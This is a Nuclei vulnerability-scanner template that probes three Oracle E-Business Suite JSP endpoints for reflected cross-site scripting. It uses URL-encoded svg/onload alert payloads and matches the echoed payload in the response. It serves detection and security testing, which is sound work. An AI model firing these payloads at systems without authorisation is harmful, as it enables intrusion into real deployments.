nuclei-templates/vulnerabilities/oracle/oracle-ebs-xss.yaml

34 lines
1.1 KiB
YAML
Raw Normal View History

2021-05-05 18:35:07 +00:00
id: oracle-ebs-xss
info:
name: Oracle EBS XSS
author: dhiyaneshDk
severity: medium
tags: oracle,xss,ebs
2021-05-07 09:18:53 +00:00
reference: |
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
2021-05-05 18:35:07 +00:00
requests:
- method: GET
path:
2021-05-07 09:18:53 +00:00
- "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
- "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
- "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
2021-05-05 18:35:07 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-05-07 09:18:53 +00:00
- "<svg/onload=alert('{{randstr}}')>"
2021-05-05 18:35:07 +00:00
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header